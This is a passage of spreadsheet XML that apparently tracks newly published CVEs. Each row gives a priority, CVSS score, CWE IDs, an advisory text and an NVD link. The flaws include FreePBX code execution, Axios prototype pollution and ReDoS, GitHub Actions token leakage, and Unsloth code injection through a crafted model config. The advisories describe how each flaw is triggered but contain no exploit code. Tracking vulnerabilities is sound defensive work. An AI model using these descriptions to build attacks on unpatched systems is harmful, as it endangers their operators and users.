          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q26" s="5" t="inlineStr"/>
      <c r="R26" s="5" t="inlineStr">
        <is>
          <t>CWE-94, CWE-95</t>
        </is>
      </c>
      <c r="S26" s="5" t="inlineStr">
        <is>
          <t>A code injection vulnerability has been discovered in the Robot Operating System 2 (ROS 2) 'ros2topic' command-line tool, affecting all ROS 2 distributions from Crystal Clemmys up to and including Lyrical Luth and Rolling Ridley. The vulnerability lies in the 'hz' verb, which reports the publishing rate of a topic and accepts a user-provided Python expression via the --filter option. This input is passed directly to the eval() function without sanitization, allowing a local user to craft and execute arbitrary code.</t>
        </is>
      </c>
      <c r="T26" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2024-42002</t>
        </is>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B27" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C27" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54708</t>
        </is>
      </c>
      <c r="D27" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E27" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F27" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G27" s="5" t="inlineStr"/>
      <c r="H27" s="5" t="inlineStr"/>
      <c r="I27" s="5" t="inlineStr"/>
      <c r="J27" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K27" s="5" t="inlineStr"/>
      <c r="L27" s="5" t="inlineStr"/>
      <c r="M27" s="5" t="inlineStr"/>
      <c r="N27" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O27" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P27" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q27" s="5" t="inlineStr"/>
      <c r="R27" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-94</t>
        </is>
      </c>
      <c r="S27" s="5" t="inlineStr">
        <is>
          <t>FreePBX is an open source IP PBX. Prior to versions 16.0.72 and 17.0.7, a critical vulnerability exists in the FreePBX backup Module that allows authenticated attackers to execute arbitrary code on the server. Authentication with a known username that has sufficient access permissions and/or write access to backup files is required. This vulnerability is caused by improper path sanitization in the backup restore functionality, enabling attackers to upload malicious PHP files to the web root directory. This issue has been patched in versions 16.0.72 and 17.0.7.</t>
        </is>
      </c>
      <c r="T27" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54708</t>
        </is>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B28" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C28" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54710</t>
        </is>
      </c>
      <c r="D28" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E28" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F28" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G28" s="5" t="inlineStr"/>
      <c r="H28" s="5" t="inlineStr"/>
      <c r="I28" s="5" t="inlineStr"/>
      <c r="J28" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K28" s="5" t="inlineStr"/>
      <c r="L28" s="5" t="inlineStr"/>
      <c r="M28" s="5" t="inlineStr"/>
      <c r="N28" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O28" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P28" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q28" s="5" t="inlineStr"/>
      <c r="R28" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-94</t>
        </is>
      </c>
      <c r="S28" s="5" t="inlineStr">
        <is>
          <t>FreePBX is an open source IP PBX. Prior to versions 16.0.40 and 17.0.7, a critical remote code execution (RCE) vulnerability exists in the superfecta module due to unsafe inclusion of arbitrary PHP files, allowing authenticated attackers to execute arbitrary PHP code on the server with the privileges of the web server user. Authentication with a known username is required. The vulnerability is rooted in the options and save_options cases in the Superfecta module's AJAX handler. The code dynamically includes PHP files from the sources/ directory based on user-supplied input. This allows an attacker to execute arbitrary code when combined with arbitrary directory creation (e.g., via the backup module) and file uploads that reveal full paths (e.g., via the soundlang module). This issue has been patched in versions 16.0.40 and 17.0.7.</t>
        </is>
      </c>
      <c r="T28" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54710</t>
        </is>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B29" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C29" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101909</t>
        </is>
      </c>
      <c r="D29" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E29" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F29" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G29" s="5" t="inlineStr"/>
      <c r="H29" s="5" t="inlineStr"/>
      <c r="I29" s="5" t="inlineStr"/>
      <c r="J29" s="5" t="inlineStr">
        <is>
          <t>node.js, axios</t>
        </is>
      </c>
      <c r="K29" s="5" t="inlineStr"/>
      <c r="L29" s="5" t="inlineStr"/>
      <c r="M29" s="5" t="inlineStr"/>
      <c r="N29" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O29" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P29" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q29" s="5" t="inlineStr"/>
      <c r="R29" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="S29" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise-based HTTP client for the browser and Node.js. From 0.28.0 until 0.34.0 and 1.15.1 until 1.20.0, ToFormData processes inherited serialization options and visitor properties supplied through prototype pollution. A separate same-process prototype-pollution flaw supplies inherited dots, indexes, metaTokens, maxDepth, visitor, or Blob values before object serialization. The inherited options alter toFormData field naming and data interpretation, maxDepth can force request failure, Blob changes value handling, and a polluted visitor can execute when an attacker already has the stronger ability to inject a function. Serialized field naming and data interpretation can change, maxDepth can cause request failure, Blob can alter value handling, and a polluted visitor can execute under the stronger function-injection primitive. This issue is fixed in versions 0.34.0 and 1.20.0.</t>
        </is>
      </c>
      <c r="T29" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101909</t>
        </is>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B30" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C30" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81375</t>
        </is>
      </c>
      <c r="D30" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E30" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F30" s="5" t="inlineStr">
        <is>
          <t>f45cbf4e-4146-4068-b7e1-655ffc2c548c</t>
        </is>
      </c>
      <c r="G30" s="5" t="inlineStr"/>
      <c r="H30" s="5" t="inlineStr"/>
      <c r="I30" s="5" t="inlineStr"/>
      <c r="J30" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K30" s="5" t="inlineStr"/>
      <c r="L30" s="5" t="inlineStr"/>
      <c r="M30" s="5" t="inlineStr"/>
      <c r="N30" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O30" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P30" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q30" s="5" t="inlineStr"/>
      <c r="R30" s="5" t="inlineStr">
        <is>
          <t>CWE-610</t>
        </is>
      </c>
      <c r="S30" s="5" t="inlineStr">
        <is>
          <t>A Confused Deputy vulnerability in the EmailTask component in Google Cloud Application Integration versions prior to 2026-06-30 on Google Cloud Platform allows an authenticated attacker to read and exfiltrate arbitrary Google-internal files via a crafted attachment file path.
This vulnerability was patched on 30 June 2026, and no customer action is needed.</t>
        </is>
      </c>
      <c r="T30" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81375</t>
        </is>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B31" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C31" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101901</t>
        </is>
      </c>
      <c r="D31" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E31" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F31" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G31" s="5" t="inlineStr"/>
      <c r="H31" s="5" t="inlineStr"/>
      <c r="I31" s="5" t="inlineStr"/>
      <c r="J31" s="5" t="inlineStr">
        <is>
          <t>node.js, axios</t>
        </is>
      </c>
      <c r="K31" s="5" t="inlineStr"/>
      <c r="L31" s="5" t="inlineStr"/>
      <c r="M31" s="5" t="inlineStr"/>
      <c r="N31" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O31" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P31" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q31" s="5" t="inlineStr"/>
      <c r="R31" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S31" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise-based HTTP client for the browser and Node.js. From 1.13.0 until 1.20.0, Http2Sessions does not install adequate error handling for a ClientHttp2Session during Axios HTTP/2 session initialization or reuse. A request uses httpVersion: 2 and the ClientHttp2Session emits an error during session initialization or reuse. The unhandled session error escapes normal Promise rejection handling. The uncaught error can terminate the Node.js process and cause denial of service. This issue is fixed in version 1.20.0.</t>
        </is>
      </c>
      <c r="T31" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101901</t>
        </is>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B32" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C32" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101903</t>
        </is>
      </c>
      <c r="D32" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E32" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F32" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G32" s="5" t="inlineStr"/>
      <c r="H32" s="5" t="inlineStr"/>
      <c r="I32" s="5" t="inlineStr"/>
      <c r="J32" s="5" t="inlineStr">
        <is>
          <t>node.js, axios, express, gin</t>
        </is>
      </c>
      <c r="K32" s="5" t="inlineStr"/>
      <c r="L32" s="5" t="inlineStr"/>
      <c r="M32" s="5" t="inlineStr"/>
      <c r="N32" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O32" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P32" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q32" s="5" t="inlineStr"/>
      <c r="R32" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="S32" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise-based HTTP client for the browser and Node.js. From 1.16.1 until 1.20.0, the RFC 2397 regular expression allows slash characters on both sides of the media-type separator. An application passes an attacker-controlled malformed data URL containing many slash characters and no comma. the JavaScript regular-expression engine explores many separator placements before rejecting the URL. Synchronous excessive backtracking can block the Node.js event loop and cause denial of service. The affected identifiers are fromDataURI, DATA_URL_PATTERN, data:. This issue is fixed in version 1.20.0.</t>
        </is>
      </c>
      <c r="T32" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101903</t>
        </is>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B33" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C33" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101906</t>
        </is>
      </c>
      <c r="D33" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E33" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F33" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G33" s="5" t="inlineStr"/>
      <c r="H33" s="5" t="inlineStr"/>
      <c r="I33" s="5" t="inlineStr"/>
      <c r="J33" s="5" t="inlineStr">
        <is>
          <t>node.js, axios, express</t>
        </is>
      </c>
      <c r="K33" s="5" t="inlineStr"/>
      <c r="L33" s="5" t="inlineStr"/>
      <c r="M33" s="5" t="inlineStr"/>
      <c r="N33" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O33" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P33" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q33" s="5" t="inlineStr"/>
      <c r="R33" s="5" t="inlineStr">
        <is>
          <t>CWE-1333, CWE-400</t>
        </is>
      </c>
      <c r="S33" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise-based HTTP client for the browser and Node.js. From 1.15.0 until 1.20.0, Axios shouldBypassProxy applies a quadratic trailing-dot regular expression to redirect hostnames. HTTP_PROXY or HTTPS_PROXY is configured, NO_PROXY or no_proxy is non-empty, redirects are followed, and a crafted redirect Location contains many dots followed by a non-dot character. Hostname.replace(/.+$/, '') backtracks quadratically while processing the crafted redirect hostname. Synchronous regular-expression processing can block the Node.js event loop and cause denial of service. This issue is fixed in version 1.20.0.</t>
        </is>
      </c>
      <c r="T33" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101906</t>
        </is>
      </c>
    </row>
    <row r="34">
      <c r="A34" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B34" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C34" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54160</t>
        </is>
      </c>
      <c r="D34" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E34" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F34" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G34" s="5" t="inlineStr"/>
      <c r="H34" s="5" t="inlineStr"/>
      <c r="I34" s="5" t="inlineStr"/>
      <c r="J34" s="5" t="inlineStr">
        <is>
          <t>github, rust</t>
        </is>
      </c>
      <c r="K34" s="5" t="inlineStr"/>
      <c r="L34" s="5" t="inlineStr"/>
      <c r="M34" s="5" t="inlineStr"/>
      <c r="N34" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O34" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P34" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q34" s="5" t="inlineStr"/>
      <c r="R34" s="5" t="inlineStr">
        <is>
          <t>CWE-829</t>
        </is>
      </c>
      <c r="S34" s="5" t="inlineStr">
        <is>
          <t>Network UPS Tools is a collection of programs which provide a common interface for monitoring and administering UPS, PDU and SCD hardware. Prior to commits 658b24e and 1aa31d1, the GitHub Actions script used to prepare NUT tarballs and update GitHub Checks statuses and PR comments about it was mis-structured in terms of mixing code running with higher privileges (single-use token generated with write permissions) and untrusted inputs (PR source branch). A malicious PR run from a fork could extract the GITHUB_TOKEN value. It could potentially be abused while it was valid (while the GHA job ran) to manipulate Git repository contents, commit checks/statuses, or issue/PR comments, according to permissions it was issued with. This issue has been patched via commits 658b24e and 1aa31d1.</t>
        </is>
      </c>
      <c r="T34" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54160</t>
        </is>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B35" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C35" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91043</t>
        </is>
      </c>
      <c r="D35" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E35" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F35" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G35" s="5" t="inlineStr"/>
      <c r="H35" s="5" t="inlineStr"/>
      <c r="I35" s="5" t="inlineStr"/>
      <c r="J35" s="5" t="inlineStr">
        <is>
          <t>hp</t>
        </is>
      </c>
      <c r="K35" s="5" t="inlineStr"/>
      <c r="L35" s="5" t="inlineStr"/>
      <c r="M35" s="5" t="inlineStr"/>
      <c r="N35" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O35" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P35" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q35" s="5" t="inlineStr"/>
      <c r="R35" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S35" s="5" t="inlineStr">
        <is>
          <t>Allocation of Resources Without Limits or Throttling vulnerability in elixir-mint mint allows a malicious HTTP/2 server to exhaust memory on the client host and cause a denial of service.
Mint.HTTP2 enforces the client's max_header_list_size setting only on the compressed size of an inbound header block, while RFC 9113 section 6.5.2 defines the limit on the decoded header list. An HPACK indexed field costs one byte on the wire and decodes to a dynamic table entry of up to 4 KB, and join_cookie_headers/1 in lib/mint/http2.ex copies every cookie value of a response into one new binary. A header block under the default 256 KB wire limit therefore makes the client allocate about 1 GB for a single response, and several such responses in one delivery exhaust the memory of the process that owns the connection or of the whole VM.
This issue affects mint: from 1.1.0 before 1.11.0.</t>
        </is>
      </c>
      <c r="T35" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91043</t>
        </is>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B36" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C36" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82323</t>
        </is>
      </c>
      <c r="D36" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E36" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F36" s="5" t="inlineStr">
        <is>
          <t>iletisim@usom.gov.tr</t>
        </is>
      </c>
      <c r="G36" s="5" t="inlineStr"/>
      <c r="H36" s="5" t="inlineStr"/>
      <c r="I36" s="5" t="inlineStr"/>
      <c r="J36" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K36" s="5" t="inlineStr"/>
      <c r="L36" s="5" t="inlineStr"/>
      <c r="M36" s="5" t="inlineStr"/>
      <c r="N36" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O36" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P36" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q36" s="5" t="inlineStr"/>
      <c r="R36" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S36" s="5" t="inlineStr">
        <is>
          <t>Authorization bypass through User-Controlled key vulnerability in Enocta Educational Technologies Inc. Enocta Platform allows Exploitation of Trusted Identifiers.
This issue affects Enocta Platform: through 2026-09-28.</t>
        </is>
      </c>
      <c r="T36" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82323</t>
        </is>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B37" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C37" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82380</t>
        </is>
      </c>
      <c r="D37" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E37" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F37" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G37" s="5" t="inlineStr"/>
      <c r="H37" s="5" t="inlineStr"/>
      <c r="I37" s="5" t="inlineStr"/>
      <c r="J37" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K37" s="5" t="inlineStr"/>
      <c r="L37" s="5" t="inlineStr"/>
      <c r="M37" s="5" t="inlineStr"/>
      <c r="N37" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O37" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P37" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q37" s="5" t="inlineStr"/>
      <c r="R37" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S37" s="5" t="inlineStr">
        <is>
          <t>Cross-Site Request Forgery (CSRF) in Apache Roller 6.1.5 allows a remote attacker to cause a logged-in user to perform state-changing actions under the victim's authority, because the CSRF validation filters accept a request that does not submit the required salt token, validating instead against a value the server itself generated for the request. No optional feature or non-default configuration is required; any logged-in author or administrator is affected when induced to visit a crafted page. Users are recommended to upgrade to Apache Roller 6.1.6 or later, which validates only the submitted salt and applies the same check to multipart forms.</t>
        </is>
      </c>
      <c r="T37" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82380</t>
        </is>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B38" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C38" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88805</t>
        </is>
      </c>
      <c r="D38" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E38" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F38" s="5" t="inlineStr">
        <is>
          <t>meissner@suse.de</t>
        </is>
      </c>
      <c r="G38" s="5" t="inlineStr"/>
      <c r="H38" s="5" t="inlineStr"/>
      <c r="I38" s="5" t="inlineStr"/>
      <c r="J38" s="5" t="inlineStr">
        <is>
          <t>go, suse</t>
        </is>
      </c>
      <c r="K38" s="5" t="inlineStr"/>
      <c r="L38" s="5" t="inlineStr"/>
      <c r="M38" s="5" t="inlineStr"/>
      <c r="N38" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O38" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P38" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q38" s="5" t="inlineStr"/>
      <c r="R38" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="S38" s="5" t="inlineStr">
        <is>
          <t>Incorrect credential cleaning on logout could be used by remote attackers to keep access credentials even after the account was logged out. Affected is SUSE Rancher 2.15 before 2.15.2.</t>
        </is>
      </c>
      <c r="T38" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88805</t>
        </is>
      </c>
    </row>
    <row r="39">
      <c r="A39" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B39" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C39" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93348</t>
        </is>
      </c>
      <c r="D39" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E39" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F39" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G39" s="5" t="inlineStr"/>
      <c r="H39" s="5" t="inlineStr"/>
      <c r="I39" s="5" t="inlineStr"/>
      <c r="J39" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K39" s="5" t="inlineStr"/>
      <c r="L39" s="5" t="inlineStr"/>
      <c r="M39" s="5" t="inlineStr"/>
      <c r="N39" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O39" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P39" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q39" s="5" t="inlineStr"/>
      <c r="R39" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S39" s="5" t="inlineStr">
        <is>
          <t>Unsloth Zoo versions 2025.9.9 before 2026.8.14, as implemented in Unsloth 2025.9.9 through 2026.8.19, contains a code injection vulnerability in the model-loading compile path where the get_transformers_model_type() function in hf_utils.py collects model_type values from nested model configurations without enforcing a character allowlist, allowing newlines and arbitrary Python source to survive normalization. Attackers can embed a newline in a nested model_type value within a malicious model's config.json to terminate the generated import statement and execute arbitrary Python code via exec() in unsloth_compile_transformers(), achieving remote code execution as the loading user when the model is loaded for training or inference.</t>
        </is>
      </c>
      <c r="T39" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93348</t>
        </is>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B40" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C40" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82348</t>
        </is>
      </c>
      <c r="D40" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E40" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F40" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G40" s="5" t="inlineStr"/>
      <c r="H40" s="5" t="inlineStr"/>
      <c r="I40" s="5" t="inlineStr"/>
      <c r="J40" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K40" s="5" t="inlineStr"/>
      <c r="L40" s="5" t="inlineStr"/>
      <c r="M40" s="5" t="inlineStr"/>
      <c r="N40" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O40" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P40" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q40" s="5" t="inlineStr"/>
      <c r="R40" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S40" s="5" t="inlineStr">
        <is>
          <t>Authorization Bypass Through User-Controlled Key in Apache Roller 6.1.5 allows an authenticated user with authoring rights on one weblog to read, modify, or delete resources belonging to another weblog through unscoped identifier-based lookups. This affects multi-user installations where users are intended to be isolated between weblogs; no optional feature or non-default configuration is required. A user with administrator rights on their weblog can also overwrite another weblog's Velocity template, whose content is evaluated when the victim weblog renders. Users are recommended to upgrade to Apache Roller 6.1.6 or later, which scopes authoring resource lookups to the acting weblog.</t>
        </is>
      </c>
      <c r="T40" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82348</t>
        </is>
      </c>
    </row>
    <row r="41">
      <c r="A41" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B41" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C41" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82928</t>
        </is>
